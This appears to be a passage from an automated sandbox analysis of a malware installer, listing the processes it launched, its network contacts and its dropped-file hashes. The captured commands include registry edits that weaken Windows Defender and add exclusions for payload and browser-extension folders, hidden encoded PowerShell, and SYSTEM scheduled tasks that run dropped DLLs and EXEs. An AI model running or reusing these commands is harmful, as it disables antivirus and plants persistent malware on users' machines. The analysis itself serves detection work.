/d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "guVLrKgQS" /SC once /ST 02:22:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "guVLrKgQS"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "guVLrKgQS"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 09:43:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe\" F0 /LRsite_idZAI 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "aUYdFpynDtMaquqaO"

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe

C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe F0 /LRsite_idZAI 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\TzXysB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\QFRhpCj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "yozVwwMRZiDXbVH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\OlrFUJF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\SieaGYe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\gdbQUZn.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAKzgitjhEJqniBRVYG2" /F /xml "C:\Program Files (x86)\ycfBUKIjHxeOC\TxsIYCe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YGcJOiVocZfwUgdee" /SC once /ST 06:59:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll\",#1 /OSsite_idEhX 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YGcJOiVocZfwUgdee"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll",#1 /OSsite_idEhX 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lwSRcZKonRlOofsg\QRdCFhVy\GBDWZzT.dll",#1 /OSsite_idEhX 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "YGcJOiVocZfwUgdee"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "aUYdFpynDtMaquqaO"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 171.101.63.23.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
DE 216.58.206.46:443 clients2.google.com tcp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 44.240.147.44:80 api2.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe

MD5 6248fde83e7929ff0561fd033b68d11c
SHA1 2ad27e8ca39e8717981c1ed451cbddcef1a8334c
SHA256 66959c9da38234dc5a24b2771036a50b47ec531c1bb0cdf7383952c6a6ccb884
SHA512 80bcb48b79563e92880f2d458f4d8f0ea95ba6319054ebc9559b76e108ca76da9d37e259635a1f727084741e2bfb13a9f93c0b5dbe1aaf720d652ea0165a3f33

memory/1476-8-0x0000000000900000-0x0000000000FBE000-memory.dmp

memory/1476-9-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/880-12-0x0000000004F60000-0x0000000004F96000-memory.dmp

memory/880-13-0x00000000735F0000-0x0000000073DA1000-memory.dmp

memory/880-14-0x0000000004F50000-0x0000000004F60000-memory.dmp

memory/880-15-0x00000000055D0000-0x0000000005BFA000-memory.dmp

memory/880-16-0x0000000005550000-0x0000000005572000-memory.dmp

memory/880-17-0x0000000005E30000-0x0000000005E96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4omnbmvu.ait.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/880-23-0x0000000005F10000-0x0000000005F76000-memory.dmp

memory/880-27-0x0000000006040000-0x0000000006397000-memory.dmp

memory/880-28-0x0000000006420000-0x000000000643E000-memory.dmp

memory/880-29-0x00000000064C0000-0x000000000650C000-memory.dmp

memory/880-30-0x0000000004F50000-0x0000000004F60000-memory.dmp

memory/880-33-0x00000000735F0000-0x0000000073DA1000-memory.dmp

memory/2796-38-0x0000000000470000-0x0000000000B2E000-memory.dmp

memory/2796-39-0x0000000010000000-0x00000000105D3000-memory.dmp

memory/1476-42-0x0000000000900000-0x0000000000FBE000-memory.dmp

memory/4812-43-0x00000000735C0000-0x0000000073D71000-memory.dmp

memory/4812-44-0x0000000003910000-0x0000000003920000-memory.dmp

memory/4812-50-0x0000000004870000-0x0000000004BC7000-memory.dmp

memory/4812-54-0x00000000051B0000-0x00000000051FC000-memory.dmp

memory/4812-55-0x0000000003910000-0x0000000003920000-memory.dmp

memory/4812-58-0x00000000735C0000-0x0000000073D71000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 aebf4bf6752c28a76f012ad901a1b27e
SHA1 9609832f721f53d59f2d01b9d740649f44f965ea
SHA256 73316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512 dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50

memory/4408-60-0x00000000735C0000-0x0000000073D71000-memory.dmp

memory/4408-61-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/4408-62-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/4408-71-0x00000000041C0000-0x0000000004517000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9932abbbf6634c23e37d2355659f3dc
SHA1 e44b31f7988b4ac0a2cd17debe90cd7aca386251
SHA256 e73b1d1d6a19e99e9d8240d49bc1be9c2fa37df88216e1d2499d8c23479e3dde
SHA512 c610338fdc900b6ca8185afb1a47bcf2c0d2e2cd5a457afed0a7ba37a8daae5635651223fa5d186fc9e08aa6104a784af4345a8d6a8a91b63cf1433ca639b93e

memory/4408-74-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/4408-75-0x00000000735C0000-0x0000000073D71000-memory.dmp

memory/4480-78-0x00007FFD46270000-0x00007FFD46D32000-memory.dmp

memory/4480-79-0x00000296AFD90000-0x00000296AFDA0000-memory.dmp

memory/4480-80-0x00000296AFD90000-0x00000296AFDA0000-memory.dmp

